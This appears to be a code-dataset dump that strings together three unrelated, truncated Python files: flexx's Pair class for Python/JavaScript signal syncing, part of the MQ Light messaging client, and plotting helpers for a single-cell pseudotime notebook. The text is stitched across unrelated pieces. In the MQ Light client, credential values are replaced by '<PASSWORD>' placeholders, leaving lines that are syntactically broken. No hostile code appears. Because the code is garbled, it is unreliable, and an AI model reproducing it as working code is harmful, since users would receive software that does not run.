input stringlengths 2.65k 237k | output stringclasses 1
value |
|---|---|
<filename>flexx/app/pair.py
"""
Base class for objects that live in both Python and JS.
This basically implements the syncing of signals.
"""
import sys
import json
import weakref
import hashlib
from .. import react
from ..react.hassignals import HasSignalsMeta, with_metaclass
from ..react.pyscript import create_js_signals_class, HasSignalsJS
from ..pyscript.functions import py2js, js_rename
from ..pyscript.parser2 import get_class_definition
from .serialize import serializer
if sys.version_info[0] >= 3:
string_types = str,
else: # pragma: no cover
string_types = basestring,
pair_classes = []
def get_pair_classes():
""" Get a list of all known Pair subclasses.
"""
return [c for c in HasSignalsMeta.CLASSES if issubclass(c, Pair)]
def get_instance_by_id(id):
""" Get instance of Pair class corresponding to the given id,
or None if it does not exist.
"""
return Pair._instances.get(id, None)
import json
class JSSignal(react.SourceSignal):
""" A signal that represents a proxy to a signal in JavaScript.
"""
def __init__(self, func_or_name, upstream=[], frame=None, ob=None, doc=None):
def func(v):
return v
if doc is not None:
func.__doc__ = doc
if isinstance(func_or_name, string_types):
func.__name__ = func_or_name
else:
func.__name__ = func_or_name.__name__
self._linked = False
react.SourceSignal.__init__(self, func, [], ob=ob)
def _subscribe(self, *args):
react.SourceSignal._subscribe(self, *args)
if not self._linked:
self.__self__._link_js_signal(self.name)
def _unsubscribe(self, *args):
react.SourceSignal._unsubscribe(self, *args)
if self._linked and not self._downstream:
self.__self__._link_js_signal(self.name, False)
class PySignal(react.SourceSignal):
""" A signal in JS that represents a proxy to a signal in Python.
"""
def __init__(self, name):
def func(v):
return v
func._name = name
react.SourceSignal.__init__(self, func, [])
class PyInputSignal(PySignal):
""" A signal in JS that represents an input signal in Python. On
the JS side, this can be used as an input too, although there is
no validation in this case.
"""
pass
class PairMeta(HasSignalsMeta):
""" Meta class for Pair
Set up proxy signals in Py/JS.
"""
def __init__(cls, name, bases, dct):
HasSignalsMeta.__init__(cls, name, bases, dct)
OK_MAGICS = '__init__', '__json__', '__from_json__'
# Create proxy signals on cls for each signal on JS
if 'JS' in cls.__dict__:
for name, val in cls.JS.__dict__.items():
if isinstance(val, react.Signal) and not isinstance(val, PySignal):
if not hasattr(cls, name):
cls.__signals__.append(name)
setattr(cls, name, JSSignal(name, doc=val._func.__doc__))
elif isinstance(getattr(cls, name), JSSignal):
pass # ok, overloaded signal on JS side
else:
print('Warning: JS signal %r not proxied, as it would hide a Py attribute.' % name)
# Implicit inheritance for JS "sub"-class
jsbases = [getattr(b, 'JS') for b in cls.__bases__ if hasattr(b, 'JS')]
JS = type('JS', tuple(jsbases), {})
for c in (cls, ): #cls.__bases__ + (cls, ):
if 'JS' in c.__dict__:
if '__init__' in c.JS.__dict__:
JS.__init__ = c.JS.__init__
for name, val in c.JS.__dict__.items():
if not name.startswith('__'):
setattr(JS, name, val)
elif name in OK_MAGICS:
setattr(JS, name, val)
cls.JS = JS
# Create proxy signals on cls.JS for each signal on cls
for name, val in cls.__dict__.items():
if isinstance(val, react.Signal) and not isinstance(val, JSSignal):
if not hasattr(cls.JS, name):
if isinstance(val, react.InputSignal):
setattr(cls.JS, name, PyInputSignal(name))
else:
setattr(cls.JS, name, PySignal(name))
elif isinstance(getattr(cls.JS, name), PySignal):
pass # ok, overloaded signal on JS side
else:
print('Warning: Py signal %r not proxied, as it would hide a JS attribute.' % name)
# Set JS and CSS for this class
cls.JS.CODE = cls._get_js()
cls.CSS = cls.__dict__.get('CSS', '')
def _get_js(cls):
""" Get source code for this class.
"""
cls_name = 'flexx.classes.' + cls.__name__
base_class = 'flexx.classes.%s.prototype' % cls.mro()[1].__name__
code = []
# Add JS version of HasSignals when this is the Pair class
if cls.mro()[1] is react.HasSignals:
c = py2js(serializer.__class__, 'flexx.Serializer')
code.append(c)
code.append('flexx.serializer = new flexx.Serializer();')
c = js_rename(HasSignalsJS.JSCODE, 'HasSignalsJS', 'flexx.classes.HasSignals')
code.append(c)
# Add this class
code.append(create_js_signals_class(cls.JS, cls_name, base_class))
if cls.mro()[1] is react.HasSignals:
code.append('flexx.serializer.add_reviver("Flexx-Pair", flexx.classes.Pair.prototype.__from_json__);\n')
return '\n'.join(code)
class Pair(with_metaclass(PairMeta, react.HasSignals)):
""" Subclass of HasSignals representing Python-JavaScript object pairs
Each instance of this class has a corresponding object in
JavaScript, and their signals are synced both ways. Signals defined
in Python can be connected to from JS, and vice versa.
The JS version of this class is defined by the contained ``JS``
class. One can define methods, signals, and (json serializable)
constants on the JS class.
Note:
This class may be renamed. Maybe Object, PairObject, ModelView
or something, suggestion welcome.
Parameters:
proxy: the proxy object that connects this instance to a JS client.
kwargs: initial signal values (see HasSignals).
Notes:
This class provides the base object for all widget classes in
``flexx.ui``. However, one can also create subclasses that have
nothing to do with user interfaces or DOM elements. You could e.g.
use it to calculate pi on nodejs.
Example:
.. code-block:: py
class MyPair(Pair):
def a_python_method(self):
...
class JS:
FOO = [1, 2, 3]
def a_js_method(this):
...
"""
# Keep track of all instances, so we can easily collect al JS/CSS
_instances = weakref.WeakValueDictionary()
# Count instances to give each instance a unique id
_counter = 0
# CSS for this class (no css in the base class)
CSS = ""
def __json__(self):
return {'__type__': 'Flexx-Pair', 'id': self.id}
def __from_json__(dct):
return get_instance_by_id(dct['id'])
def __init__(self, proxy=None, **kwargs):
# Set id and register this instance
Pair._counter += 1
self._id = self.__class__.__name__ + str(Pair._counter)
Pair._instances[self._id] = self
# Flag to implement eventual synchronicity
self._seid_from_js = 0
# Init proxy
if proxy is None:
from .proxy import manager
proxy = manager.get_default_proxy()
self._proxy = proxy
self._proxy.register_pair_class(self.__class__)
# Instantiate JavaScript version of this class
clsname = 'flexx.classes.' + self.__class__.__name__
cmd = 'flexx.instances.%s = new %s(%r);' % (self._id, clsname, self._id)
self._proxy._exec(cmd)
self._init()
# Init signals - signals will be connected updated, causing updates
# on the JS side.
react.HasSignals.__init__(self, **kwargs)
def _init(self):
""" Can be overloaded when creating a custom class.
"""
pass
@property
def id(self):
""" The unique id of this Pair instance. """
return self._id
@property
def proxy(self):
""" The proxy object that connects us to the runtime.
"""
return self._proxy
def __setattr__(self, name, value):
# Sync attributes that are Pair instances
react.HasSignals.__setattr__(self, name, value)
if isinstance(value, Pair):
txt = serializer.saves(value)
cmd = 'flexx.instances.%s.%s = flexx.serializer.loads(%r);' % (self._id, name, txt)
self._proxy._exec(cmd)
def _set_signal_from_js(self, name, text, esid):
""" Notes on synchronizing:
- Py and JS both send updates when a signal changes.
- JS does not send an update for signal updates received from Py.
- Py does, to allow eventual synchronicity. Read on.
- JS sends updates with a nonzero esid (eventual synchronicity
id) and marks the corresponding signal with the same id.
- Py sends an update with the esid that it got from JS, or 0
if the signal originates from Py.
- When JS receives an update from Py, it checks whether the
seid is 0 (the signal originates from Py) or if the signal
seid is 0 (the signal was updated from py since we last
updated it from JS). If either is 0, it updates the signal
value, and sets the signal esid to 0.
"""
signal = getattr(self, name)
value = serializer.loads(text)
self._seid_from_js = esid # to send back to js
signal._set(value)
def _signal_changed(self, signal):
# Set esid to 0 if it originates from Py, or to what we got from JS
esid = self._seid_from_js
self._seid_from_js = 0
if not isinstance(signal, JSSignal):
#txt = json.dumps(signal.value)
txt = serializer.saves(signal.value)
cmd = 'flexx.instances.%s._set_signal_from_py(%r, %r, %r);' % (self._id, signal.name, txt, esid)
self._proxy._exec(cmd)
def _link_js_signal(self, name, link=True):
""" Make a link between a JS signal and its proxy in Python.
This is done when a proxy signal is used as input for a signal
in Python.
"""
# if self._proxy is None:
# self._initial_signal_links.discart(name)
# if link:
# self._initial_signal_links.add(name)
# else:
link = 'true' if link else 'false'
cmd = 'flexx.instances.%s._link_js_signal(%r, %s);' % (self._id, name, link)
self._proxy._exec(cmd)
def call_js(self, call):
cmd = 'flexx.instances.%s.%s;' % (self._id, call)
self._proxy._exec(cmd)
class JS:
def __json__(self):
return {'__type__': 'Flexx-Pair', 'id': self.id}
def __from_json__(dct):
return flexx.instances[dct.id]
def __init__(self, id):
# Set id alias. In most browsers this shows up as the first element
# of | |
<filename>mqlight/client.py<gh_stars>10-100
# python-mqlight - high-level API by which you can interact with MQ Light
#
# Copyright 2015-2017 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
mqlight
~~~~~~~
MQ Light is designed to allow applications to exchange discrete pieces of
information in the form of messages. This might sound a lot like TCP/IP
networking, and MQ Light does use TCP/IP under the covers, but MQ Light takes
away much of the complexity and provides a higher level set of abstractions to
build your applications with.
"""
from __future__ import division, absolute_import
import sys
import uuid
import threading
import os.path
import codecs
import time
import inspect
import re
from json import loads, dumps
from random import random
from pkg_resources import get_distribution, DistributionNotFound
from .utils import ManagedList, \
SubscriptionRecord, SubscriptionRecordBuild, \
UnsubscriptionRecord, UnsubscriptionRecordBuild, \
SendRecord, SendRecordBuild, decode_link_address, \
validate_callback_function, Security, Service, \
ServiceGenerator, hide_password, is_text
import ssl
try:
import httplib
from urlparse import urlparse
from urllib import quote, quote_plus
except ImportError:
import http.client as httplib
from urllib.parse import urlparse
from urllib.parse import quote, quote_plus
from .exceptions import MQLightError, InvalidArgumentError, \
NetworkError, NotPermittedError, ReplacedError, \
StoppedError, SubscribedError, UnsubscribedError, SecurityError, \
InternalError
from .logging import get_logger, NO_CLIENT_ID
from .definitions import QOS_AT_MOST_ONCE, QOS_AT_LEAST_ONCE
PYTHON2 = sys.version_info < (3, 0)
PYTHON3 = sys.version_info >= (3, 0)
if PYTHON3:
from queue import Queue, Empty
from importlib import reload
else:
from Queue import Queue, Empty
from exceptions import SystemExit
CMD = ' '.join(sys.argv)
if 'setup.py test' in CMD \
or 'py.test' in CMD \
or 'unittest' in CMD \
or 'runfiles.py' in CMD:
from .stubmqlproton import _MQLightMessage, \
_MQLightMessenger, _MQLightSocket
else:
from .mqlproton import _MQLightMessenger, _MQLightMessage, _MQLightSocket
# The connection retry interval in seconds
if PYTHON2:
reload(sys)
sys.setdefaultencoding('utf8')
try:
__version__ = get_distribution('mqlight').version
except DistributionNotFound:
__version__ = 1.0
# Set up logging (to stderr by default). The level of output is
# configured by the value of the MQLIGHT_NODE_LOG environment
# variable. The default is 'ffdc'.
LOG = get_logger(__name__)
LOG.show_trace_header()
# Regex for the client id
INVALID_CLIENT_ID_REGEX = r'[^A-Za-z0-9%/\._]'
STARTED = 'started'
STARTING = 'starting'
STOPPED = 'stopped'
STOPPING = 'stopping'
RETRYING = 'retrying'
ERROR = 'error'
MESSAGE = 'message'
MALFORMED = 'malformed'
DRAIN = 'drain'
STATES = (
STARTED,
STARTING,
STOPPED,
STOPPING,
RETRYING
)
CONNECT_RETRY_INTERVAL = 1
class ActiveClients(object):
"""
Set of active clients
"""
def __init__(self):
self.clients = {}
def add(self, client):
"""
Add client to set
"""
self.clients[client.get_id()] = client
def remove(self, client_id):
"""
Remove client from set
"""
self.clients.pop(client_id, None)
def get(self, client_id):
"""
Get client from set
"""
if self.has(client_id):
client = self.clients[client_id]
else:
client = None
return client
def has(self, client_id):
"""
Return True if the specified client is in the set
"""
found = client_id in self.clients
return found
def _should_reconnect(error):
"""
Generic helper method to determine if we should automatically reconnect
for the given type of error.
"""
LOG.entry('_should_reconnect', NO_CLIENT_ID)
LOG.parms(NO_CLIENT_ID, 'error:', type(error))
result = not isinstance(error, (
TypeError,
InvalidArgumentError,
NotPermittedError,
ReplacedError,
StoppedError,
SubscribedError,
UnsubscribedError,
SecurityError))
LOG.exit('_should_reconnect', NO_CLIENT_ID, result)
return result
def _get_http_service_function(http, http_url):
"""
Function to take a single HTTP URL and using the JSON retrieved from it to
return an array of service URLs.
"""
LOG.entry('_get_http_service_function', NO_CLIENT_ID)
LOG.parms(NO_CLIENT_ID, 'http:', http)
LOG.parms(NO_CLIENT_ID, 'http_url:', http_url)
def _http_service_function(callback):
LOG.entry('_http_service_function', NO_CLIENT_ID)
LOG.parms(NO_CLIENT_ID, 'callback:', callback)
func = httplib.HTTPConnection
if http_url.scheme == 'https':
func = httplib.HTTPSConnection
LOG.data(NO_CLIENT_ID, 'using :', func.__name__)
host = http_url.netloc
if http_url.port:
host += ':{0}'.format(http_url.port)
LOG.data(NO_CLIENT_ID, 'host:', host)
path = http[http.index(http_url.netloc) + len(http_url.netloc):]
LOG.data(NO_CLIENT_ID, 'path:', path)
try:
conn = func(host)
conn.request('GET', path)
res = conn.getresponse()
if res.status == httplib.OK:
try:
json_obj = loads(res.read())
if 'service' in json_obj:
service = json_obj['service']
else:
service = None
callback(None, service)
except Exception as exc:
err = TypeError(
'{0} request to {1} returned '
'unparseable JSON: {2}'.format(
http_url.scheme, http, exc))
LOG.error('_http_service_function', NO_CLIENT_ID, err)
callback(err, None)
else:
err = NetworkError(
'{0} request to {1} failed with a status code '
'of {2}'.format(http_url.scheme, http, res.status))
LOG.error('_http_service_function', NO_CLIENT_ID, err)
callback(err, None)
except httplib.HTTPException as exc:
err = NetworkError(
'{0} request to {1} failed: {2}'.format(
http_url.scheme, http, exc))
LOG.error('_http_service_function', NO_CLIENT_ID, err)
callback(err, None)
LOG.exit('_http_service_function', NO_CLIENT_ID, None)
LOG.exit(
'_get_http_service_function',
NO_CLIENT_ID,
_http_service_function)
return _http_service_function
def _get_file_service_function(file_url):
"""
Function to take a single FILE URL and using the JSON retrieved from it to
return an array of service URLs.
"""
LOG.entry('_get_file_service_function', NO_CLIENT_ID)
LOG.parms(NO_CLIENT_ID, 'file_url:', file_url)
if not isinstance(file_url, str):
err = TypeError('file_url must be a string')
LOG.error('_get_file_service_function', NO_CLIENT_ID, err)
raise err
file_path = file_url
# Special case for windows drive letters in file URIS, trim the leading /
if os.name == 'nt' and re.match(r'^\/[a-zA-Z]:\/', file_path):
file_path = file_path[1:]
def _file_service_function(callback):
LOG.entry('_file_service_function', NO_CLIENT_ID)
LOG.parms(NO_CLIENT_ID, 'callback:', callback)
opened = False
with codecs.open(file_path, encoding='utf-8', mode='r') as file_obj:
try:
opened = True
json_obj = loads(file_obj.read())
if 'service' in json_obj:
service = json_obj['service']
else:
service = None
LOG.data(NO_CLIENT_ID, 'service:', service)
callback(None, service)
except Exception as exc:
err = MQLightError(
'The content read from {0} contained '
'unparseable JSON: {1}'.format(file_path, exc))
LOG.error('_file_service_function', NO_CLIENT_ID, err)
callback(err, None)
file_obj.close()
if not opened:
err = MQLightError(
'attempt to read {0} failed'.format(file_path))
LOG.error('_file_service_function', NO_CLIENT_ID, err)
callback(err, None)
LOG.exit('_file_service_function', NO_CLIENT_ID, None)
LOG.exit(
'_get_file_service_function',
NO_CLIENT_ID,
_file_service_function)
return _file_service_function
def _generate_service_list(service, security_options):
"""
Function to take a single service URL, or list of service URLs, validate
them, returning a list of service URLs
"""
LOG.entry('_generate_service_list', NO_CLIENT_ID)
LOG.parms(NO_CLIENT_ID, 'security_options:', security_options)
# Ensure the service is a list
input_service_list = []
if not service:
error = TypeError('service is undefined')
LOG.error('_generate_service_list', NO_CLIENT_ID, error)
raise error
elif hasattr(service, '__call__'):
error = TypeError('service cannot be a function')
LOG.error('_generate_service_list', NO_CLIENT_ID, error)
raise error
elif isinstance(service, list):
if not service:
error = TypeError('service array is empty')
LOG.error('_generate_service_list', NO_CLIENT_ID, error)
raise error
input_service_list = service
elif isinstance(service, str):
input_service_list = [service]
else:
error = TypeError('service must be a str or list type')
LOG.error('_generate_service_list', NO_CLIENT_ID, error)
raise error
# Validate the list of URLs for the service, inserting default values as
# necessary Expected format for each URL is: amqp://host:port or
# amqps://host:port (port is optional, defaulting to 5672 or 5671 as
# appropriate)
service_list = []
auth_user = None
auth_password = <PASSWORD>
for i, service in enumerate(input_service_list):
service_url = urlparse(service)
protocol = service_url.scheme
# Check for auth details
if service_url.username:
if service_url.password:
auth_user = service_url.username
auth_password = <PASSWORD>_url.password
else:
error = InvalidArgumentError(
'URLs supplied via the service property must specify both '
'a user name and a password value, or omit both values')
LOG.error('_generate_service_list', NO_CLIENT_ID, error)
raise error
user = security_options.user
if user and user != auth_user:
error = InvalidArgumentError(
'User name supplied as user property '
'security_options.user does not match '
'username supplied via a URL passed via the '
'service property {0}'.format(auth_user))
LOG.error('_generate_service_list', NO_CLIENT_ID, error)
raise error
password = <PASSWORD>
if password and password != <PASSWORD>_password:
error = InvalidArgumentError(
'Password name supplied as password property '
'security_options.password does not match '
'password supplied via a URL passed via the '
'service property {0}'.format(auth_password))
LOG.error('_generate_service_list', NO_CLIENT_ID, error)
raise error
if i == 0:
security_options.url_user = auth_user
security_options.url_password = <PASSWORD>
# Check whatever URL user names / passwords are present this
# time through the loop - match the ones set on security_options
# by the first pass through the loop.
if i > 0:
if security_options.url_user != auth_user:
error = InvalidArgumentError(
'URLs supplied via the service property contain '
'inconsistent username values')
LOG.error('_generateServiceList', NO_CLIENT_ID, error)
raise error
elif security_options.url_password != <PASSWORD>:
error = InvalidArgumentError(
'URLs supplied via the service property contain '
'inconsistent password values')
LOG.error('_generateServiceList', NO_CLIENT_ID, error)
raise error
# Check we are trying to use the amqp protocol
if protocol not in ('amqp', 'amqps'):
error = InvalidArgumentError(
'Unsupported URL {0} specified for service. '
'Only the amqp or amqps protocol are supported.'.format(
service))
LOG.error('_generate_service_list', NO_CLIENT_ID, error)
raise error
# Check we have a hostname
host = service_url.hostname
if not host:
error = InvalidArgumentError(
'Unsupported | |
<filename>notebooks/utils.py
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.lines as mlines
import numpy as np
import pandas as pd
from collections import OrderedDict
from cycler import cycler
import warnings
warnings.filterwarnings('ignore')
matplotlib.style.use('ggplot')
matplotlib.rcParams['axes.facecolor'] = 'white'
matplotlib.rcParams['axes.edgecolor'] = 'black'
# plt.rc('axes', color_cycle=['royalblue', 'orange', 'green', 'red', 'blueviolet', 'sienna', 'hotpink', 'gray', 'y', 'c'])
# plt.rc('axes', color_cycle=['royalblue', 'green', 'sienna', 'c', 'orange', 'red', 'blueviolet', 'hotpink', 'gray', 'y'])
plt.rc('axes', prop_cycle=cycler(color=['royalblue', 'green', 'sienna', 'c', 'orange', 'red', 'blueviolet', 'hotpink', 'gray', 'y']))
# axes.prop_cycle : cycler('color', ['b', 'g', 'r', 'c', 'm', 'y', 'k'])
def getari_for_latent_space(X, truelabels):
from sklearn.cluster import KMeans
from sklearn.metrics.cluster import adjusted_rand_score
kmeans = KMeans(n_clusters=10, random_state=0).fit(X)
kmeans.labels_ = kmeans.labels_ + 1
ARI = adjusted_rand_score(truelabels, kmeans.labels_)
return ARI
def calcroughness(x, pt):
x=np.atleast_2d(x)
i=np.argsort(pt)
x = x[:,i]
N = x.shape[1]
assert(N > 0)
S = x.std(axis=1)
return np.sqrt(np.sum(np.square(x[:,0:(N-1)] - x[:, 1:N]),1) / (N-1)) / S
def cbtime_to_tau(pTime, startTime, endTime, timeDiff):
t = pTime * (endTime - startTime) / 100.
t = t + (startTime + timeDiff / 2.)
if t >= endTime:
t = t - (endTime - startTime)
return t
def tau_to_cbtime(tau, startTime, endTime, timeDiff):
t = tau - (startTime + timeDiff / 2.)
if t <= 0.:
t = t + (endTime - startTime)
t = t * 100. / (endTime - startTime)
if t > 100:
t = np.abs(100 - t)
return t
def plot(title, xLabel, yLabel, xData, yData, cpt, xErr=None, **kwargs):
plt.rcParams['axes.facecolor'] = 'white'
plt.rcParams['axes.edgecolor'] = 'black'
# plt.figure(figsize=(8, 6))
plt.title( '%s' % ( title ) )
plt.xlabel('%s' % (xLabel), fontsize=16)
plt.ylabel('%s' % (yLabel), fontsize=16)
cellCapture = OrderedDict((('6', 'red'), ('18', 'green'), ('30', 'blue'), ('42', 'orange')))
color_map = [0 for i in range(len(cpt))]
for i in range(0, len(cpt)):
if cpt[i] == 6:
color_map[i] = 'red'
elif cpt[i] == 18:
color_map[i] = 'green'
elif cpt[i] == 30:
color_map[i] = 'blue'
else:
color_map[i] = 'orange'
if 'datset' in kwargs:
cellCapture = OrderedDict((('0', 'red'), ('2', 'green'), ('4', 'blue'), ('7', 'orange')))
for i in range(0, len(cpt)):
if cpt[i] == 1:
color_map[i] = 'red'
elif cpt[i] == 2:
color_map[i] = 'green'
elif cpt[i] == 3:
color_map[i] = 'blue'
else:
color_map[i] = 'orange'
# print(cellCapture)
markers = [plt.Line2D([0, 0], [0, 0], color=color, marker='o', ms=10, linestyle='') for color in cellCapture.values()]
plt.scatter(xData, yData, 100, c=color_map, alpha=0.6)
if xErr is not None:
plt.errorbar(xData, yData, xerr=xErr, fmt='none', marker='none', ecolor=color_map)
# l = plt.legend(markers, cellCapture.keys(), numpoints=1, title='Capture', bbox_to_anchor=(1.1, 0.5), loc=10, fontsize=16)
l = plt.legend(markers, cellCapture.keys(), numpoints=1, title='Capture', loc=4, fontsize=16)
plt.setp(l.get_title(), fontsize=16)
# plt.show()
def plot_comparison(plotDf, dataset='Windram'):
plt.rcParams['axes.facecolor'] = 'white'
plt.rcParams['axes.edgecolor'] = 'black'
title = 'Comparision to the DeLorean Model'
xLabel = 'Number of inducing points'
fig, ax = plt.subplots(nrows=1, ncols=2, sharex=True, figsize=(16, 6))
ax[0].plot(plotDf.inducingPoints, plotDf['sMean'], linestyle='--', color='r', linewidth=3.)
ax[0].plot(plotDf.inducingPoints, plotDf['sMean'], 'rs', markersize=8)
ax[0].plot(plotDf.inducingPoints, plotDf['sBest'], '--', color='r', linewidth=3.)
ax[0].plot(plotDf.inducingPoints, plotDf['GPLVM_avg'], color='g', linewidth=3.)
ax[0].plot(plotDf.inducingPoints, plotDf['GPLVM_best'], 'go', markersize=8)
ax[0].plot(plotDf.inducingPoints, plotDf['GPLVM_best'], color='g', linewidth=3.)
ax[0].set_ylabel('Spearman Correlation', fontsize=16)
ax[1].plot(plotDf.inducingPoints, plotDf['timeDeLorean'], linestyle='--', color='r', linewidth=2.5)
ax[1].plot(plotDf.inducingPoints, plotDf['GPLVM_fitting_time'], color='g', linewidth=2.5)
ax[1].set_ylabel('Fitting time (s)', fontsize=16)
plt.suptitle(title, fontsize=20)
fig.text(0.5, 0.04, xLabel, ha='center', va='center', fontsize=16)
plt.xticks(plotDf.inducingPoints)
blue_line = mlines.Line2D([], [], color='green', linewidth=3., label='BGPLVM(Best)')
red_line = mlines.Line2D([], [], color='red', linestyle='--', linewidth=3., label='DeLorean(Best)')
dashed1 = mlines.Line2D([], [], color='red', marker='s', markersize=8, linestyle='--', linewidth=3.,
label='DeLorean(Avg)')
dashed2 = mlines.Line2D([], [], color='green', marker='o', markersize=8, linewidth=3., label='BGPLVM(Avg)')
l1 = plt.legend(handles=[red_line, blue_line, dashed1, dashed2], numpoints=1, bbox_to_anchor=(-0.4, 0.4), loc=10,
fontsize=12)
red_line_dotted = mlines.Line2D([], [], color='red', linestyle='--', linewidth=2.5, label='DeLorean')
green_line_solid = mlines.Line2D([], [], color='green', linewidth=2.5, label='BGPLVM')
l2 = plt.legend(handles=[red_line_dotted, green_line_solid], numpoints=1, bbox_to_anchor=(0.8, 0.4), loc=10,
fontsize=12)
fig.gca().add_artist(l1)
fig.gca().add_artist(l2)
def plot_fitting_time_comparison(plotDf):
plt.rcParams['axes.facecolor'] = 'white'
plt.rcParams['axes.edgecolor'] = 'black'
plt.figure(figsize=(8, 8))
plt.plot(plotDf['inducingPoints'], plotDf['timeDeLorean'], linestyle='--', linewidth=2.5, color='r')
plt.plot(plotDf['inducingPoints'], plotDf['GPLVM_fitting_time'], linewidth=2.5, color='g')
_ = plt.ylabel('Fitting time (s)', fontsize=16)
_ = plt.xlabel('Number of inducing points', fontsize=16)
_ = plt.xticks(plotDf['inducingPoints'], fontsize=12)
_ = plt.yticks(fontsize=12)
green_line = mlines.Line2D([], [], color='green', linewidth=2.5, label='BGPLVM')
red_line = mlines.Line2D([], [], color='red', linestyle='--', linewidth=2.5, label='DeLorean')
_ = plt.legend(handles=[red_line, green_line], bbox_to_anchor=(1.21, 0.5), loc=10, fontsize=20, frameon=False)
def plot_genes(pseudotimes, geneProfiles, geneData, cpt, prediction):
plt.rcParams['axes.facecolor'] = 'white'
plt.rcParams['axes.edgecolor'] = 'Gray'
plt.rc('xtick', labelsize=15)
startTime = 1.
endTime = 3.55
timeDiff = 0.85
selectedGenes = geneProfiles.keys().values
cbPeaktime = np.zeros(len(selectedGenes))
for g in range(0, len(selectedGenes)):
cbPeaktime[g] = cbtime_to_tau(geneData[selectedGenes[g]].cbPeaktime, startTime, endTime, timeDiff)
# print(geneData[selectedGenes[g]].cbPeaktime)
Xnew = prediction[0]
meanDf = prediction[1]
varDf = prediction[2]
# Create a Dataframe to contain predictive mean and variance
predictDf = {}
for i in range(len(selectedGenes)):
predictDf[selectedGenes[i]] = pd.DataFrame({'mean': meanDf[selectedGenes[i]], 'var': varDf[selectedGenes[i]]})
# Plot the result
title = 'McDavid'
xLabel = 'Pseudotime'
yLabel = 'Expression'
fig, ax = plt.subplots(nrows=2, ncols=3, sharex=True, sharey=True, figsize=(12, 8))
# plt.suptitle(title, fontsize=16)
fig.text(0.5, -0.04, xLabel, ha='center', va='center', fontsize=20)
fig.text(0.04, 0.5, yLabel, ha='center', va='center', rotation='vertical', fontsize=20)
xValues = np.array([1., 1.85, 2.7, 3.55])
xString = np.array(['G2/M', 'G0/G1', 'S', 'G2/M'])
plt.xticks(xValues, xString)
plt.xlim(1., 3.55)
# Following codes are used just to add legends
cellCycleStages = {'g0/g1': u'red', 's': u'green', 'g2/m': u'blue'}
stageColorCodes = ['red', 'green', 'blue']
color_map = [stageColorCodes[cpt[i] - 1] for i in range(len(cpt))]
markers = [plt.Line2D([0, 0], [0, 0], color=color, marker='o', markersize=9, linestyle='') for color in
cellCycleStages.values()]
l = plt.legend(markers, cellCycleStages.keys(), numpoints=1, title='Capture Stages', bbox_to_anchor=(1.6, 1.1),
loc=10, fontsize=20, frameon=False)
plt.setp(l.get_title(), fontsize=20)
n = 0
for row in ax:
for col in row:
col.plot(Xnew[:, 0], predictDf[selectedGenes[n]]['mean'].values, 'black', lw=1)
col.fill_between(Xnew[:, 0], predictDf[selectedGenes[n]]['mean'].values - \
2 * np.sqrt(predictDf[selectedGenes[n]]['var'].values),
predictDf[selectedGenes[n]]['mean'].values + \
2 * np.sqrt(predictDf[selectedGenes[n]]['var'].values), color='grey', alpha=0.5)
col.scatter(pseudotimes, geneProfiles[selectedGenes[n]], 130, marker='.', c=color_map, alpha=0.6)
col.set_title(selectedGenes[n], fontsize=16)
col.axvline(cbPeaktime[n], linestyle='--', color='black')
plt.setp(col.xaxis.get_majorticklabels(), rotation=90)
col.yaxis.set_tick_params(labelsize=14)
n = n + 1
def plotcorrelation(X, Y, title, data_labels):
# plt.rcParams['axes.facecolor'] = 'white'
# plt.rcParams['axes.edgecolor'] = 'black'
# plt.rc('axes', color_cycle=['royalblue', 'orange', 'green', 'red', 'blueviolet', 'sienna', 'hotpink', 'gray', 'y', 'c'])
legend_order = ['1', '2', '4', '8', '16', '32 ICM', '32 TE', '64 PE', '64 TE', '64 EPI']
# label_order = ['1', '16', '2', '32 ICM', '32 TE', '4', '64 PE', '64 TE', '64 EPI', '8']
yVals = np.array([1, 2, 4, 8, 16, 24, 32])
yStrings = np.array(['1', '2', '4', '8', '16', '32', '64'])
for l in legend_order:
x = Y[data_labels == l]
if x[0]==64.:
x = [x[i] - 32 for i in range(0,len(x))]
elif x[0] == 1.:
x = [x[i] - 0. for i in range(0, len(x))]
elif x[0] == 4.:
x = [x[i] + 0. for i in range(0, len(x))]
elif x[0] == 32.:
x = [x[i] - 8. for i in range(0, len(x))]
plt.scatter(X[data_labels == l], x, 100, label=l)
plt.tick_params(labelsize=14)
plt.yticks(yVals, yStrings)
plt.xlabel('Pseudotime', fontsize = 20)
plt.ylabel('Capture time', fontsize=20)
plt.title(title, fontsize=20)
l = plt.legend(loc="lower right", fontsize=14, ncol=2, title="Capture stages", borderaxespad=0., columnspacing=0.2, handletextpad=0.1)
plt.setp(l.get_title(), fontsize=16)
def plot_XY(X, Y, title, data_labels, label_order=None, **kwargs):
# plt.rcParams['axes.facecolor'] = 'white'
# plt.rcParams['axes.edgecolor'] = 'black'
# plt.rc('axes', color_cycle=['royalblue', 'orange', 'green', 'red', 'blueviolet', 'sienna', 'hotpink', 'gray', 'y', 'c'])
if label_order is None:
label_order = ['1', '2', '4', '8', '16', '32 ICM', '32 TE', '64 PE', '64 TE', '64 EPI']
mSize = 100
if 'ms' in kwargs: mSize = kwargs.pop('ms')
fsize = 16
if 'fontsize' in kwargs: fsize = kwargs.pop('fontsize')
for l in label_order:
plt.scatter(X[data_labels == l], Y[data_labels == l], mSize, label=l)
xPos = np.median(X[data_labels == l])
yPos = np.median(Y[data_labels == l])
# if title != 'With prior' and l == '32 TE':
# xPos = xPos - 0.4
# if title == 'With prior' and l == '64 TE':
# xPos = xPos + 0.2
plt.text(xPos, yPos, l, fontsize=fsize, weight='bold')
xlabel = 'GPLVM-1 (Pseudotime)'
ylabel = 'GPLVM-2'
if 'xlabel' in kwargs: xlabel = kwargs.pop('xlabel')
if 'ylabel' in kwargs: ylabel = kwargs.pop('ylabel')
plt.xlabel(xlabel, fontsize=20)
plt.ylabel(ylabel, fontsize=20)
plt.title(title, fontsize=20)
def correlation_dpt(xData, yData, cpt, ax, title, diagLine=False):
cellCapture = OrderedDict((('0','red'), ('2','green'), ('4','blue'), ('7','orange')))
color_map = [0 for i in range(len(cpt))]
for i in range(0,len(cpt)):
if cpt[i] == 1:
color_map[i] = 'red'
elif cpt[i] == 2:
color_map[i] = 'green'
